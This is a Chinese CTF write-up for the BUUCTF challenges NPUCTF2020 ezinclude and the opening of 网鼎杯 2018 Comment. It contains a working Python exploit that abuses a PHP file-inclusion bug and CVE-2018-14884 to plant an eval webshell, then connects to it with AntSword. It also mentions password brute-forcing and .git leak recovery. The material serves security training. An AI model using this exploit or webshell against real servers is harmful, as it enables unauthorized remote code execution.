[NPUCTF2020]ezinclude
参考:php7 segment fault特性(CVE-2018-14884) - Eddie_Murphy - 博客园 (cnblogs.com)
[BUUCTF题解][NPUCTF2020]ezinclude 1 - Article_kelp - 博客园 (cnblogs.com)
查看源码发现
然后抓包发现一个hash值
然后我直接传参数,让pass即是这一个Hash值- ?pass=fa25e54758d5d5c1927781a6ede89f8a
然后我们访问flflflflag.php,网页访问直接就是404,我们在burp访问一下
然后有一个文件包含,我们输入- ?file=php://filter/read=convert.base64-encode/resource=index.php
然后没发现啥,看到了过滤了一些东西,然后我们得想办法getshell
然后查了一下可以利用CVE-2018-14884- 使用php://filter/string.strip_tags导致php崩溃清空堆栈重启,如果在同时上传了一个文件,那么这个tmp file就会一直留在tmp目录,知道文件名就可以getshell,因为/tmp/xxx,里面的xxx是随机的,需要我们获取才能利用
以下是师傅的脚本- import requests
- from io import BytesIO #BytesIO实现了在内存中读写bytes
- payload = "<?php eval($_POST[cmd]);?>"
- data={'file': BytesIO(payload.encode())}
- url="http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
- r=requests.post(url=url,files=data,allow_redirects=False)
然后蚁剑连接- http://03c49e5c-9594-4b26-8498-0eb1f8203cff.node5.buuoj.cn:81/flflflflag.php?file=/tmp/phpFVc8V7
然后给脚本里面改一下,直接改成phpinfo,然后查看一下文件名,访问- /flflflflag.php?file=/tmp/phpeEMvZk
[网鼎杯 2018]Comment
参考:[BUUCTF题解][网鼎杯 2018]Comment - Article_kelp - 博客园 (cnblogs.com)
[网鼎杯 2018]Comment题解,超详细!_网鼎杯2018 comment-CSDN博客
[网鼎杯 2018]Comment(二次注入,git泄露,git恢复)_[网鼎杯 2018]comment 1-CSDN博客
随便发了一个批评
提示我们登录,密码是少了三位的,我们burp爆破一下,记得改一下位数
然后爆破出来就是zhangwei666
然后登陆进来没啥东西,然后扫描发现了git泄露
然后我们使用githacker<a href="https://github.com/WangYihang/GitHacker" target="_blank" rel="noopener">WangYihang/GitHacker:
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
